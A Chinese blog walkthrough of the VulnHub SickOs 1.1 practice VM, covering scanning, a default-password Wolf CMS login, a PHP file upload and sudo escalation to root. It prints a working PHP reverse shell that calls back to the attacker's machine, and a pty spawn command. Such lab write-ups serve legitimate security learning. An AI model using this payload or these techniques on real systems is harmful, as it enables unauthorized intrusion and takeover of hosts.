12-vulnhub-SickOs 1.1

vulnhub-SickOs 1.1

靶机地址:https://www.vulnhub.com/entry/sickos-11,132/

目标:得到root权限&找到flag.txt

作者:尼德霍格007

时间:2021-8-2

一、信息收集

扫描目标主机ip地址

nmap -sP 192.168.21.0/24

image-20210802224724035

可以看到靶机ip地址是192.168…21.148,192.168.21.128是kali攻击机的ip地址

接下来扫描开放的端口

nmap -A -p 1-64000 192.168.21.148 

image-20210802225454727

可以看到靶机开放了22,3128,和一个8080端口且3128是个代理端口,

用nikto扫描一下

nikto -h 192.168.21.148 -useproxy http://192.168.21.148:3128

image-20210802230206730

用nikto扫描出很多信息,透露了/cgi-bin/status位置(容易受到shellshock攻击),这边还存在robots.txt,访问一下robots.txt

我们先开启代理,如果不用代理80是没打开的

image-20210802225707741

然后访问它的80端口

image-20210802225750476

祝贺你!!!看了一下源码没啥信息

打开robots

image-20210802230624085

发现一个目录/wolfcms,经过百度之后发现这是一个内容管理系统并且存在文件上传漏洞

image-20210802231228993

网上找了下别人登录cms的链接

http://192.168.21.148/wolfcms/?/admin/login

image-20210802231332207

试试弱密码

使用admin/admin登陆成功

image-20210802231400793

Files选项里面可以上传文件或者更改文件

image-20210802231444743

二、获取shell

创建一个反弹shell的木马

<?php
$sock=fsockopen('192.168.21.128',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>

把它保存为php文件,然后上传

image-20210803005436283

在kali中开启监听

image-20210803005605279

之后在这里点击访问上传的nide.php文件

http://192.168.21.148/wolfcms/public/

即可获得shell

image-20210803005644007

找一下,很容易就找到了配置文件,在其中发现了数据库账户和密码

image-20210803005909353

这里可以使用python进入tty

python -c 'import pty;pty.spawn("/bin/bash")'

看看有哪儿些用户

image-20210803010459870

三、提权

有个sickos用户,试试能不能用刚才获得数据库密码登录

image-20210803010634015

试了一下,还真行

查看一下用户id,发现sickos用户在sudo组里,所以这里直接sudo提权,得到root权限

image-20210803010746158

image-20210803011031927

四、总结

这次靶机渗透中间遇到了好几次障碍,后来各种百度谷歌终于解决了,其中涉及的shell反弹木马、提权等还需要我进一步学习。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼德霍格007

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值